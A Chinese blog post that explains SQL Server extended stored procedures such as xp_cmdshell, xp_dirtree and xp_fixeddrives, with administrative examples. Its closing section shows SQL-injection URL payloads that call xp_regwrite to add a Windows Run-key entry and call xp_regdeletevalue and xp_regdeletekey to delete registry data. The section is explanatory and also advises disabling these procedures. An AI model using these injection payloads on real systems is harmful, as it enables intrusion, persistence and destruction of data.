sql server 常用的扩展存储过程详解

作者:袖梨 2022-06-29

sql server 里面提供了丰富的系统存储过程来辅助我们管理数据库以及开发。今天分享介绍一些常用的数据库扩展存储过程

 xp_cmdshell

这个大家都比较熟悉了,使用xp_cmdshell 可以在连接sql server 的时候可以执行doc 命令

最简单一个例子EXEC master.sys.xp_cmdshell 'dir D:' 获取D 盘下面的目录。当然这个D: 是服务器上面的,不是本地电脑的。

所以有时候可以使用 xp_cmdshell 配合作业都角度使用执行bcp等命令来导入导出数据,也是很方便的。

但是使用的过程中,有下面几点留意一下

1 首次使用的时候,需要使用 EXEC sys.sp_configure @configname = 'xp_cmdshell',@configvalue = 1 来启用xp_cmdshell ,默认情况下,sql server 是禁用本功能的

2 可以使用 no_output 来忽略输出结果。

3 注意权限问题,注意非管理员账号的用户使用xp_cmdshell 。

 

xp_logininfo

这个返回的是服务器windows 用户和windows 组的信息

msdn上面写着这个存储过程具有3个参数 @acctname ,@option ,@privilege

燃鹅不知道是我测试的问题还是本身这个存储过程只有1个参数,@option 和 @privilege 传入进去都是无效的。

使用方法

 EXEC master.sys.xp_logininfo

 或者 EXEC master.sys.xp_logininfo @acctname = 'GINLATOPGin' 加上个账号名还是ok的

 

xp_msver

这个是返回服务器的版本消息。

调用方法可以使用

EXEC master..xp_msver

或者 EXEC master..xp_msver 'ProductName' --这个可以是上面的结果集返回的任意一个Name 的值,假如找不到,就会返回空结果集

 

xp_sprintf

这个扩展存储过程看起来就有点像入门写C语言的printf 函数了。燃鹅即时这样,我认为其实用到它的机会并不多。大部分使用的场景如下

DECLARE @i VARCHAR(20) = 1,
@j varchar(50) = 'ajofen',
@s VARCHAR(80)

EXEC master..xp_sprintf @s OUTPUT,'there are two varaint one is %s and another is %s ',@i,@j
PRINT @s

坑爹的是,这个存储过程的参数只支持字符型的……并且如果这样搞的话,使用 +来拼接字符串也ok了,所以也只是介绍一下?(?_?)?

 

xp_sscanf

这个扩展存储过程是对插入的字符串变量进行格式化取值。

DECLARE @i VARHAR(50) = 1,
@j varchar(50) ,
@s VARCHAR(80)

EXEC master..xp_sscanf '3 + 31 = 34','%s + %s =34',@i OUTPUT,@s OUTPUT
SELECT @i,@j,@s

补充:

--获得MS SQL的版本号
execute master..sp_msgetversion

--得到硬盘文件信息
--参数说明:目录名,目录深度,是否显示文件
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1


--列出服务器上安装的所有OLEDB提供的程序
execute master..xp_enum_oledb_providers

--列出服务器上安装的所有代码页
execute master..xp_enumcodepages

--列出服务器上配置的dsn
execute master..xp_enumdsn

--列出sql server错误日志列表,最后更新时间
execute master..xp_enumerrorlogs

--列出服务器上所有windows本地组
execute master..xp_enumgroups

--检测文件存在性
execute master..xp_fileexist 'c:/a.bak'

declare @flag int

exec master..xp_fileexist 'c:/abc.bak',@flag out

if @flag=1
begin
print 'exist'
end
else
begin
print 'no exist'
end

--列出服务器上固定驱动器,以及每个驱动器的可用空间
execute master..xp_fixeddrives


--得到当前sql server服务器的计算机名称
execute master..xp_getnetname

--列出当前错误日志的具体内容
EXEC [master].[dbo].[xp_readerrorlog]

--列出指定目录的所有下一级子目录
EXEC [master].[dbo].[xp_subdirs] 'c:/WINNT'


---列出驱动器的名称
--以字节为单位的空闲空间(low free)
--以驱动器类型:软驱(1),硬盘(2),cd-rom(8)
EXEC [master].[dbo].[xp_availablemedia]
--效果如下:

name low free high free media type
C:/ 1270386688 0 2
D:/ 1726824448 2 2
E:/ 875053056 10 2
F:/ 0 0 8

还有在[master].[dbo].[sp_addlogin]里面有加密函数pwdencrypt,大家感兴趣可以试试


SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,
在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
http://127.0.0.1/view.asp?id=165
存在mssql的sql注入,那么
xp_regwrite 写入注册表
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/run','TestValueName','reg_sz','hello'
注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName'

xp_regdeletekey 删除键,包括该键下所有值

使用方法:
http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey'

 好,本次分享在这里结束了。下次看看再找一下。或者大家补充一下

相关文章

精彩推荐